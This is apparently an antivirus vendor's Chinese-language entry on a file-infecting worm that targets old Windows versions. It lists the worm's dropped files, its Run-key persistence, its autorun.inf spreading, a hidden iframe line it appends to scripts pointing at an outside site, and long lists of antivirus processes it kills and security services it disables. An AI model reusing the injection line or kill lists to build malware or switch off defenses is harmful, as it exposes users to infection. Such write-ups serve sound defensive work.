订阅病毒名稱(中文):
病毒別名:
威脅級別:
★☆☆☆☆
病毒類型:
蠕蟲病毒
病毒長度:
708096
影響系統:
Win9xWinMeWinNTWin2000WinXPWin2003
病毒行爲:
這是一個感染型病毒。會感染可執行文件和腳本文件。
1、生成的文件
%DOCUME~1%\ADMINI~1\LOCALS~1\Temp\BLACKSEEDER1.1
%SystemRoot%\DownloadedProgramFiles\0005486A.exe
%SystemRoot%\DownloadedProgramFiles\0005486A.DAT
2、添加啓動項
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
"MSLOGON"="C:\WINNT\DownloadedProgramFiles\0005486A.exe"
3、在個盤下生成autorun.inf啓動,並設置文件屬性爲隱藏。
%X:%\0005486A.exe
%X:%\autorun.inf
4、感染腳本,在腳本末添加
%iframesrc=http://www.wangzheqiaodan.com/girl/picture.***width=0height=0%%/iframe%
5、感染可執行文件,修改原文件入口,在原文件加名爲BSDR1.1的節。
6、不斷的讀軟區,發現沒軟盤會不斷的彈沒軟盤的錯誤提示。
7、結束下列進程
mcshield.exe
vstskmgr.exe
naprdmgr.exe
aterui.exe
tbmon.exe
scan32.exe
ravmond.exe
ccenter.exe
ravtask.exe
rav.exe
ravmon.exe
ravmond.exe
ravstub.exe
kvxp.kxp
kvmonxp.kxp
kvcenter.kxp
kvsrvxp.exe
kregex.exe
uihost.exe
trojdie.kxp
frogagent.exe
360Safe.exe
AST.exe
8、修改下列服務,禁止啓動運行
kavsvc
AVP
AVPkavsvc
McAfeeFramework
McShield
McTaskManager
McAfeeFrameworkMcShield
McTaskManager
navapsvc
KVWSC
KVSrvXP
Schedule
sharedaccess
RsCCenter
RsRavMon
RsCCenter
RsRavMon
wscsvc
KPfwSvc
SNDSrvc
ccProxy
ccEvtMgr
ccSetMgr
SPBBCSvc
Symantec
CoreLC
NPFMntor
MskService
FireSvc
Alerter
